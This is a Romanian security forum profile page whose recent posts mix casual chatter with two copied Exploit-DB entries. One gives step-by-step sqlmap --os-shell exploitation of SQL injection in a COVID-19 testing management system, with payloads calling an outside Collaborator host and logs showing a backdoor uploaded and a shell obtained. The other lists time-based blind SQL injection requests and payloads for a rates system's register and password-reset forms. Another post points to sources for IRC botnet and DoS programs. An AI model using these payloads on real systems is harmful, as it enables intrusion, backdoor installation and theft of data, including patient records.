Jump to content

GabrielRo

Members
  • Posts

    21
  • Joined

  • Last visited

  • Days Won

    2

GabrielRo last won the day on December 15 2021

GabrielRo had the most liked content!

Reputation

17 Good

About GabrielRo

  • Rank
    Contributor
    Contributor

Profile Information

  • Gender
    Male

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. Ti-ai făcut cont aici doar sa-ti faci reclama! Slăbuț Seo... 🙂😅
  2. Asa este, totul ce se găsește aici public, găsești și acolo.. surse bubuite de Botnet IRC Rxbot, de la programe scrise în Visual Basic Dos Attack.
  3. Sunt vaccinat, si ma voi mai vaccina daca trebuie. Si nu bag in seama ce zice șoșoacă.
  4. https://pasteboard.co/MTYkd9IZ1lxD.jpg 🌡😂
  5. Nu l-am instalat inca, urmeaza sa il instalez.
  6. https://www.digi24.ro/stiri/sci-tech/whatsapp-facebook-si-instagram-au-picat-la-nivel-mondial-1689813 🤔🙄
  7. Vulnerable App: # Exploit Title: COVID19 Testing Management System 1.0 - 'searchdata' SQL Injection # Google Dork: intitle: "COVID19 Testing Management System" # Date: 09/08/2021 # Exploit Author: Ashish Upsham # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/ # Version: v1.0 # Tested on: Windows Description: The COVID19 Testing Management System 1.0 application from PHPgurukul is vulnerable to SQL injection via the 'searchdata' parameter on the patient-search-report.php page. ==================== 1. SQLi ==================== http://192.168.0.107:80/covid-tms/patient-search-report.php The "searchdata" parameter is vulnerable to SQL injection, it was also tested, and a un-authenticated user has the full ability to run system commands via --os-shell and fully compromise the system POST parameter 'searchdata' is vulnerable. step 1 : Navigate to the "Test Report >> Search Report" and enter any random value & capture the request in the proxy tool. step 2 : Now copy the post request and save it as test.txt file. step 3 : Run the sqlmap command "sqlmap -r test.txt -p searchdata --os-shell" ---------------------------------------------------------------------- Parameter: searchdata (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: searchdata=809262'+(select load_file('yhj3lhp8nhgr0sb7nf7ma0d0wr2hq6.burpcollaborator.net'))+'') AND (SELECT 4105 FROM (SELECT(SLEEP(5)))BzTl) AND ('Rxmr'='Rxmr&search=Search Type: UNION query Title: Generic UNION query (NULL) - 5 columns Payload: searchdata=809262'+(select load_file('yhj3lhp8nhgr0sb7nf7ma0d0wr2hq6.burpcollaborator.net'))+'') UNION ALL SELECT NULL,NULL,CONCAT(0x716a767071,0x59514b74537665486a414263557053556875425a6543647144797a5a497a7043766e597a484e6867,0x7176767871),NULL,NULL,NULL,NULL-- -&search=Search [19:14:14] [INFO] trying to upload the file stager on '/xampp/htdocs/' via UNION method [19:14:14] [INFO] the remote file '/xampp/htdocs/tmpuptfn.php' is larger (714 B) than the local file '/tmp/sqlmap_tng5cao28/tmpaw4yplu2' (708B) [19:14:14] [INFO] the file stager has been successfully uploaded on '/xampp/htdocs/' - http://192.168.0.107:80/tmpuptfn.php [19:14:14] [INFO] the backdoor has been successfully uploaded on '/xampp/htdocs/' - http://192.168.0.107:80/tmpbmclp.php[19:14:14] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER os-shell> whoami do you want to retrieve the command standard output? [Y/n/a] y command standard output: 'laptop-ashish\ashish' os-shell> Sursa: https://www.exploit-db.com/exploits/50190
  8. Vulnerable App: # Exploit Title: RATES SYSTEM 1.0 - 'Multiple' SQL Injections # Date: 11-08-2021 # Exploit Author: Halit AKAYDIN (hLtAkydn) # Software Link: https://www.sourcecodester.com/php/14904/rates-system.html # Version: V1.0 # Category: Webapps # Tested on: Linux/Windows # Description: # PHP Dashboards is prone to an SQL-injection vulnerability # because it fails to sufficiently sanitize user-supplied data before using # it in an SQL query.Exploiting this issue could allow an attacker to # compromise the application, access or modify data, or exploit latent # vulnerabilities in the underlying database. # Vulnerable Request: POST /register.php HTTP/1.1 Host: localhost Content-Length: 70 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/register.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=rou48ptlhqkrlt68jpd9ugndgf Connection: close ClientId=0001&email=hltakydn%40pm.me&pwd1=123456&pwd2=123456&register= # Vulnerable Payload: # Parameter: ClientId (POST) # Type: time-based blind # Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) # Payload: ClientId=ojEY' AND (SELECT 4947 FROM (SELECT(SLEEP(10)))haeq) AND 'mdgj'='mdgj&email=&pwd1=iYkb&pwd2=&register=oQCR -------------------------------------------------------------------------------------------------------------------------- # Vulnerable Request: POST /passwordreset.php HTTP/1.1 Host: localhost Content-Length: 61 Cache-Control: max-age=0 sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88" sec-ch-ua-mobile: ?0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/passwordreset.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=a8600labr48ehj6d8716ho0h61 Connection: close loginId=1&clientId=1&email=hltakydn%40pm.me&pwd=123456&reset= # Vulnerable Payload: # Parameter: loginId (POST) # Type: time-based blind # Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) # Payload: loginId=FPDr' AND (SELECT 4535 FROM (SELECT(SLEEP(10)))SJvL) AND 'rtGr'='rtGr&clientId=&email=VXzw&pwd=&reset=xlcX Sursa: https://www.exploit-db.com/exploits/50192
×
×
  • Create New...